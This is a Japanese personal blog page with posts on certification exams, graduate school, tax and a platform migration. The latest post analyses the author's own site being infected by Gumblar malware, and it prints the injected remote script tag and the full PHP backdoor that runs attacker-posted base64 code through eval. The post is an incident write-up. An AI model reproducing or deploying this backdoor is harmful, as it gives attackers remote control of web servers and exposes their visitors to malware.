自分のサイトが「攻撃サイトとして報告されています!」ってなんだ?

Posted on 9月 4, 2010
Filed Under Others | 1 Comment

昨日ブログに「librahack」について思うところを書こうと思って自分のサイトにアクセスすると、
攻撃サイトとして報告されています!
とか言われてポカーンとしてしまいました。

Firefoxで↓こんな感じの画面が表示される。。
http://ameblo.jp/aspafiri/image-10269414157-10187571516.html

なんだろうと思って調べてみると、なんだかサイトが改ざんされてマルウェアを仕込まれた模様。。
「gifimg.php」とかで調べてみると「Gumbler.x」とか呼ばれているやつっぽかった。
※Googleさんマルウェアの検出もしてくれるのですね。ありがたやありがたや。

急いでサイト上のログやらなんやらを確認してみると、8/31に最初に改ざんされていて、
9/2まで何度もFTP経由で知らんIPからログインされて改ざんが試みられていたみたい。。
たぶん、FTPのパスワードが弱すぎたのが原因かな、、、
(でも、ここ5年で初めて。。もしまた再発したらwordpressとかの脆弱性かもしれない。)

改ざん内容を調べてみるとJavaScriptファイルとHTMLファイルとPHPファイルが
ターゲットとなって改ざんされていた。

JavaScriptファイルとHTMLファイルには怪しいScriptタグが仕込まれていて、
知らんサイトの gifimg.php というURLを勝手に読み込むようになっていた。

↓こんなタグ。
<script src=http://projekt-team.com/images/gifimg.php ></script>

これが原因で攻撃サイトとして認識されたっぽい。
(脆弱性をつかれる可能性があるので上のアドレスはアクセスしない方がいいです)

PHPファイルの改ざんはちょっといやらしくて、上のスクリプトが仕込まれるに加えて、
base64エンコードされている怪しいPHPプログラムが実行されちゃう仕組みになっていた。

base64デコードしてコードの中身を見てみると、バックドアが仕込まれる感じになっとった。
eというHTTPパラメータに対してbase64されたPHPコードがPOSTされるとevalされて実行しちゃうよみたいな。

↓こんなコード。
if(!function_exists('h1u')){function h1u($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode(
'PHNjcmlwdCBzcmM9aHR0cDovL3Byb2pla3QtdGVhbS5jb20vaW1hZ2VzL2dpZml
tZy5waHAgPjwvc2NyaXB0Pg=='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function h1u2($a,$b,$c,$d){global$h1u1;$s=array();if(function_exists($h1u1))call_user_func($h1u1,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='h1u')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('h1u');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$h1ul=(($a=@set_error_handler('h1u2'))!='h1u2')?$a:0;eval(base64_decode($_POST['e']));

でも、そんなにややこしいマルウェアじゃなくてよかったよかった。
すごい昔に、Cのコードをバックドア経由で送りつけてその場で裏でコンパイルして悪意のあるコードを実行して最後にその形跡を消して去っていくマルウェアに遭遇したことがあるので、それにく比べればマシかも。

それにしても、改ざんされた全部のファイルを元に戻すのがとても面倒でした。。

ファイルを全部元に戻した後、最後にGoogleさんに攻撃サイトじゃないことを伝えるため
Googleウェブマスターツールから自分のサイトの再審査を申請。

今日サイトを確認すると攻撃サイトではなくなっておりました。ホッ。。

こんなマルウェアにひかっかるなんて恥ずかしい限りでございます。。

【教訓】
弱いパスワードを使うのはやめよう。

情報セキュリティスペシャリスト試験

Posted on 6月 25, 2010
Filed Under Others | 1 Comment

本日(6/25)合格発表が出たみたいなので確認してみますと。
http://www.jitec.jp/

受験番号 SC353-0360 の方は, 合格 です
午前Ⅰ得点 ***.**点
午前Ⅱ得点 84.00点
午後Ⅰ得点 70点
午後Ⅱ得点 70点

満点,合格基準は次のとおりです。
時間区分 満点 基準点
午前Ⅰ試験 100点 60%以上
午前Ⅱ試験 100点 60%以上
午後Ⅰ試験 100点 60%以上
午後Ⅱ試験 100点 60%以上

やっぱり、ボーダーラインが下がったおかげですごく合格しやすくなった気がします。。
前までの基準だと75%くらいだったから、午後Iで落ちていたなぁ。。。

データベーススペシャリスト試験

Posted on 7月 2, 2009
Filed Under Others | 2 Comments

すっかり忘れていたDB試験の合格証書が今日届いてた。

受験番号 DB215-1614 の方は, 合格 です
午前Ⅰ得点 78.20点
午前Ⅱ得点 92.00点
午後Ⅰ得点 82点
午後Ⅱ得点 68点

満点,合格基準は次のとおりです。
時間区分 満点 基準点
午前Ⅰ試験 100点 60%以上
午前Ⅱ試験 100点 60%以上
午後Ⅰ試験 100点 60%以上
午後Ⅱ試験 100点 60%以上

うーん、、、ボーダーラインが下がったおかげで合格できただけなので微妙な気持ち。
前の基準だと今回も午後2で不合格だったなぁ。

MAGNIFICENT @ 新木場 ageHa 2008-04-12

Posted on 4月 14, 2008
Filed Under Others | 2 Comments

土曜は朝から夕方まで学校でお勉強。
その後、仕事仲間の家にお邪魔して飲んだくれ会をしていました。
飲んだくれ会があったので、ageHaには行かない予定だったんですが、
酔っ払ってきたらクラブ行きたくなってきてageHaに行くことにしちゃいました♪

なんせ、Tiestoのプレイがあったものですから。

ギリ終電で新木場向かったんですが、酔っ払ったせいもあり、乗り過ごし・・・
大井町から新木場までタクシーに乗ってしまいました・・・
が、しばらくしたところ辺りから、タクシーの運ちゃん、道がぜんぜんわかってない。
しかも道をうろうろしたせいでメーターめっちゃあがってる。
8000円超えそうになったくらいのところでメッチャ文句言って5000円に値切りました。
プロなんだから道迷うなよオヤジ。カーナビの使い方くらい覚えろよ。

とりあえずageHaに到着したが、長蛇の列。。しかも雨。寒い。
1時くらいから並んで、結局中には入れたのが2時半くらい。長かった。。

中に入って、お知り合いの方と合流。そっからはもう、朝まで狂ってました。

みなさまお疲れでした~。ちょー楽しかったす。

Tiesto、やっぱスゴイ良かったなぁ~。

平成20年4月より学生さんになりますっ。

Posted on 12月 29, 2007
Filed Under Others | 2 Comments

2007年度もそろそろ終わりを迎えるのですね。
時間が経つのってホントはやい。。。
最近は仕事がてんてこまいだったので実感が全然沸きません。

さて、2006年の12月より個人事業主としてお仕事をするようになって1年が経ちました。
そもそも、なぜ個人事業主になったかと言うといくつかの理由があるのですが、実のところ
一番の理由は「とある学校に通いたいなと」思ったので、その学費を稼ぐことでした。

で、今年の11月頃より産業技術大学院大学という学校の受験に挑んでみました。
情報アーキテクチャっていう専攻です。
この学校、ホントは4年制大学を卒業していないと受験資格がないんですが、事前審査
というもので大卒に相当する学力があると認められれば受験が可能でした。

あたくしは大学なんて出てないんでもちろん事前審査をしなければなりません。

しくしく。

でも、とりあえず職務経歴書等を送付したら通過しちゃいました。
ソフトウェア開発技術者の資格がよかったのかな。
資格なんてクソくらえと思ってたけど、取っといてよかった。うん。

で、受験パターンにも何種類かあって、今回自分はAO入試っつー枠で受験してみました。

AO入試にはペーパーテストが存在しません。
まず、自己推薦書や職務経歴書等による書類審査がされ、書類審査の通過後、
面接による口頭質問(12/9)、その後、プレゼンテーション試験(12/15)がありました。

で、先週あたりに結果が出て、無事に合格できちゃいました。
アプリケーションエンジニア試験に続いての合格でハッピーな気分です。

ちなみに夜の学校(エロい意味は込められてません)なので、日中の仕事が
終わった後に学校に通う感じになります。あ、あと、土曜日も。

ただでさえクソ忙しいのに学校なんて行けるのかと思ったりもしますが、
そこはナントカ気合と体力と根性で2年間頑張ってみたいと思います。

そんな感じの最近でした。

ってことで、皆様よいお年をお過ごしくださいっ♪

いじょっ!

アプリケーションエンジニア試験

Posted on 12月 22, 2007
Filed Under Others | 2 Comments

2007年10月に受けたアプリケーションエンジニア試験(AE)の結果がでました。。。

受験番号 AE241 - 0609 の方は,合格です。
午前試験のスコアは,650 点です。
午後I試験のスコアは,620 点です。
午後II試験の評価ランクは,A です。

キタコレ。
最近不合格ばっか続いてたんで、久々に嬉しい気分です。
資格試験なんて持っててもたいして役に立つもんじゃないですが、
受かるとまた頑張ろうという気持ちになれますね!

・・・と、半年ぶりのBlog更新でした。。。

テクニカルエンジニア(データベース)

Posted on 6月 12, 2007
Filed Under Others | 2 Comments

受験番号 DB241 - 0054 の方は,不合格です。
午前試験のスコアは,615 点です。
午後I試験のスコアは,725 点です。
午後II試験のスコアは,585 点です。

マジ悲しい。午後IIあと15点で合格だったのカヨ。

住民税は住んでいる地域の自治体によって違うのか?

Posted on 5月 11, 2007
Filed Under Others | 4 Comments

こんばんわ。最近はずいぶんと暖かい季節になってきましたね。
昼休みにポカポカ陽気の中、外をお散歩をするととても気持ちよいです。

さて、本日は住民税について気になってしまったので眠い目をこすりながら調べてみました。

よく、「公共事業等(公共施設とか競馬場とか)に力を入れている自治体管轄に住むと
住民税が高い」と耳にすることがありますが果たして本当でしょうか?

私は現在フリーランスですが、フリーランスになる前に所得税や住民税、健康保険料、個人事業税などについて一通り調べたことがあります。その時は「住民税は、課税所得に住民税率(所得割+均等割)を乗算して算出されるため全国一律である」という結論に達しました。

でも、いろんな人が「住んでるところで住民税は違う!」というので、不安になり調べ直してみました。

結果、やはり「住民税はどこに住んでも全国一律」です。

以下のサイトを見ると全国一律であることがわかります。

札幌市 - 東京事務所 - 市税の窓口 - Q&A2(住民税の額は自治体によって異なる?)
クイック案内/寝屋川市の住民税は高いの?
教えて!goo 住民税の値段
教えて!goo 住民税は23区それぞれ違うものですか

では、なぜこのようなデマがよく知れ渡っているのでしょうか。

ちょっぴり考えてみたいと思います。

まず、住民税が上がる条件は以下の2つが考えられます。
 1.所得が増加した
 2.控除額が減少した

ここから考えられることは「引越しをしたタイミングで上記の条件に当てはまった人が勘違いをした」という可能性くらいです。
しかし、これだけではみんなが口をそろえて「住んでるところで住民税が違う」と言うようには思えません。

他に勘違いをする原因があるとすれば以下のようなものでしょうか。

1.国民健康保険料と住民税を混同している
⇒ 国民健康保険料については 「住民税 × 自治体ごとに定められた保険料率」で決まるため、住んでいる地域によって支払わなければならない保険料額が変わります。

2.一人当たりの住民税額と混同している
⇒ 高額納税者が多い地域だと一人当たりの住民税支払金額を算出した際、他の地域より住民税が高いように見え勘違いをしてしまっている可能性があります。
 例えば、以下のようなケースを考えてみましょう。
  【A市(高額納税者少なめ)】 人口:100人  100人全員の住民税総額:500万円
                    → 一人当たりの納税額:5万円
  【B市(高額納税者多め)】  人口:100人  100人全員の住民税総額:2200万円
                    → 一人当たりの納税額:22万円

 「一人当たりの住民税額」なのに勘違いしてしまっているのかもしれませんね。
 参考:じょうほうばこ:住民税ランキング - livedoor Blog(ブログ)

4/28~5/5は一年半ぶりくらいに実家に帰ります。

Posted on 4月 27, 2007
Filed Under Others | 1 Comment

ひさびさに実家に帰ります。
1人ムスコを持つわたくしの親からしてみれば、さぞ待ち遠しいことでしょう。
中学卒業した後ずっと親から離れて暮らした親不孝なムスコですまん、オカン。
ということなので、GWに幕別(俺の地元の町の名前です)に帰る方がいましたら
ゼヒゼヒ飲みにでも行きたいですな。4/28~5/5で「幕別にいるぜ」っていう
お暇な方がいましたらご連絡頂ければご一緒したく思います。はい。

それにしても最近は仕事が忙しくて泣きそうです。

MovableTypeからWordPressへ移行。。。

Posted on 3月 20, 2007
Filed Under Others | Leave a Comment

こんばんわ。お久しぶりな更新です。

なんか、今使ってるレンタルサーバでMovableType(MT)動かすと糞重いので
WordPress(WP)に変更しました。MTだと1ページ遷移するごとに数十秒~数分、
もしくはタイムアウトが頻発だったんですけど、WPにしたら全然快適になりました。
初めてまともにWordPress使ってみたんですけど、MovableTypeよりすごくいい。
動作も軽くなったし、ユーザーインターフェースも使いやすい。

最初からこっちにしとけばよかった。

ちぇ。

keep looking »

Recently


Categories


Archives